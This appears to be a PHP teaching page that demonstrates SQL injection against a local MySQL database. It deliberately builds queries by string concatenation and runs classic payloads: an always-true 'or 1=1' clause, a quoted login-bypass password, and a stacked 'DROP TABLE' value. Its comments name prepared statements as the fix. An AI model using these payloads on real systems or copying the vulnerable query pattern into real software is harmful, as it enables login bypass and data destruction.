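<html>
<head>
<title>MySQL Database</title>
</head>
<body>
<?php
// Local teaching page: every query below is built by string concatenation on
// purpose, to show how a crafted value changes the statement's meaning. The
// real-world fix is a prepared statement with bound parameters ($conn->prepare()),
// never hand-escaping; the hardening done here only concerns the page itself
// (error handling, HTML escaping) and leaves the demonstration intact.

// Connection settings for a throw-away local database (MAMP-style port).
// Hard-coded credentials are tolerable only because this instance must never
// be reachable from a network.
$user = 'root';
$password = 'root';
$db = 'sql_injection';
$host = 'localhost';
$port = 8889;

// Make query() return false on failure instead of throwing (the default since
// PHP 8.1), so each example can report its own outcome below.
mysqli_report(MYSQLI_REPORT_OFF);

// Create connection. $port was declared but never passed before, so the
// configured port was silently ignored.
$conn = new mysqli($host, $user, $password, $db, $port);
// Check connection: nothing below works without it, and a null $conn would
// otherwise surface as an unrelated fatal error on the first query.
if ($conn->connect_error) {
    die("Connection failed: " . htmlspecialchars($conn->connect_error, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'));
}

/**
 * Escapes a value for the HTML text context.
 *
 * Database rows and the example payloads contain quotes and SQL fragments;
 * echoing them raw would let a stored value inject markup into this page.
 *
 * @param mixed $value  cast to string before escaping
 * @return string
 */
function h($value)
{
    return htmlspecialchars((string) $value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/**
 * Prints one "id - name - email" line per row of a result set.
 *
 * The password column is deliberately never echoed.
 *
 * @param mysqli_result $result  a successful SELECT result
 * @return void
 */
function print_rows($result)
{
    while ($row = $result->fetch_assoc()) {
        echo "id: " . h($row["id"]) . " - name: " . h($row["name"]) . " - email: " . h($row["email"]) . "<br>";
    }
}

/**
 * Runs one injection example and reports whether it returned rows.
 *
 * A query the server rejects (syntax error, refused stacked statement) is
 * reported as "not successful" together with the server's error text, instead
 * of the original fatal error from reading num_rows on false.
 *
 * @param mysqli $conn    open connection
 * @param string $sql     the full statement to execute, as the example built it
 * @param string $answer  explanation echoed verbatim when rows come back
 * @return void
 */
function run_example($conn, $sql, $answer)
{
    $result = $conn->query($sql);
    if ($result === false) {
        echo "The attack was not successful!" . "<br>";
        echo "MySQL error: " . h($conn->error) . "<br><br>";
        return;
    }
    if ($result->num_rows > 0) {
        echo "The attack was successful!" . "<br><br>";
        echo $answer;
        // output data of each row
        print_rows($result);
    } else {
        echo "The attack was not successful!" . "<br><br>";
    }
    $result->free();
}
?>
<h1>SQL INJECTION</h1>
<h2>Database User</h2>
<?php
// SHOWING ALL THE RESULTS FROM DB USER
// The password column was selected before but never displayed; do not pull
// secrets out of the database that the page has no use for.
$sql = "SELECT id, name, email FROM USER";
$result = $conn->query($sql);
if ($result === false) {
    echo "Query failed: " . h($conn->error) . "<br>";
} elseif ($result->num_rows > 0) {
    // output data of each row
    print_rows($result);
    $result->free();
} else {
    echo "0 results";
}
?>
<h2>Examples</h2>
<H3>Example One</H3>
<?php
// CODE BELOW IS ABOUT SQL INJECTION
$sql_injection = "SELECT * FROM User WHERE id = 1000";
// examples
$example_one = " or 1=1";
// tests -> only change the number of example
$sql_injection_test = $sql_injection . $example_one;
echo "SQL used: " . h($sql_injection_test) . "<br><br>";
echo "Input: " . h($example_one) . "<br><br>";
run_example(
    $conn,
    $sql_injection_test,
    "Answer: The SQL above is valid. It will return all rows from the table Users, since WHERE 1=1 is always true!" . "<br><br>"
);
?>
<H3>Example Two</H3>
<?php
// CODE BELOW IS ABOUT SQL INJECTION
$sql_injection = "SELECT * FROM User WHERE email = 'bobo@email.com' and password = '1234'";
// examples
$example_two = " or 1=1";
// tests -> only change the number of example
$sql_injection_test = $sql_injection . $example_two;
echo "SQL used: " . h($sql_injection_test) . "<br><br>";
echo "Input: " . h($example_two) . "<br><br>";
run_example(
    $conn,
    $sql_injection_test,
    "Answer: The SQL above is valid. It will return all rows from the table Users, since WHERE 1=1 is always true!" . "<br><br>"
);
?>
<H3>Example Three</H3>
<?php
// CODE BELOW IS ABOUT SQL INJECTION
// examples
// Named $input_* so they no longer overwrite the $user/$password connection
// credentials defined at the top of the page.
$input_user = "1";
$input_password = "1' or '1'='1";
$sql_injection = "SELECT * FROM User WHERE email = '" . $input_user . "' and password = '" . $input_password . "'";
echo "SQL used: " . h($sql_injection) . "<br><br>";
echo "Input user: " . h($input_user) . "<br>";
echo "Input password: " . h($input_password) . "<br><br>";
run_example($conn, $sql_injection, "Answer:");
?>
<H3>Example Four</H3>
<?php
// CODE BELOW IS ABOUT SQL INJECTION
// examples
$id = "1; DROP TABLE User1";
$sql_injection = "SELECT * FROM User WHERE id=" . $id;
// mysqli::query() sends a single statement, so the server is expected to
// reject the stacked "; DROP TABLE" as a syntax error and nothing is dropped.
// The example shows the payload shape; the error is displayed rather than
// silently discarded as before.
$result = $conn->query($sql_injection);
echo "SQL used: " . h($sql_injection) . "<br><br>";
echo "Input id: " . h($id) . "<br>";
if ($result === false) {
    echo "MySQL error: " . h($conn->error) . "<br><br>";
} else {
    $result->free();
}
?>
<?php
// closing the connection
$conn->close();
?>
</body>
</html>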